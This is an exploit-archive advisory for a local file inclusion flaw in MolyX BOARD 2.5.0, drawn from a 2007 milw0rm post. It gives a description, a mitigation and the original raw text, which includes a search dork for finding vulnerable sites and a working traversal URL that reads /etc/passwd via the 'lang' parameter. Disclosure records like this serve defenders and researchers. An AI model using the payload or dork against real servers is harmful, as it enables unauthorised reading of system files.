MolyX BOARD 2.5.0 Local File Inclusion

vendor:

MolyX BOARD

by:

MurderSkillz

5.5

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: MolyX BOARD

Affected Version From: 2.5.2000

Affected Version To: 2.5.2000

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

MolyX BOARD 2.5.0 Local File Inclusion

This vulnerability allows an attacker to include local files on the server by manipulating the 'lang' parameter in the 'index.php' file. By using a relative path traversal technique, an attacker can access sensitive files such as the '/etc/passwd' file. This vulnerability affects all files within the MolyX BOARD 2.5.0 web application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of MolyX BOARD or implement proper input validation to prevent path traversal attacks.

Source

Exploit-DB raw data:

=============== MolyX BOARD 2.5.0 Local File Inclusion ==== Possibly other versions

=============== Vulnerability found by MurderSkillz ==============================================

=============== d0rk "Powered by MolyX BOARD 2.5.0" =========================================

=============== Website: g00ns.net g00ns-forum.net ============================================

=============== Irc: irc.exploitercode.com:6667 ts: ts.g00ns.net ====================================

=============== Script website: molyx.com ====================================================

############### Exploit ###################################################################

www.victim.com/[path to board if any]/index.php?lang=../../../../../../../../etc/passwd%00

This Vulnerability takes place in pretty much every file in this webapp...

########################################################################################

Shouts: FiSh,sCuZz, sick, clorox, z3r0, katalyst, SyNiCaL, overdose, pr0be, Trintitty, rezen, str0ke and everyone else at g00ns.net that I forgot..

# milw0rm.com [2007-05-18]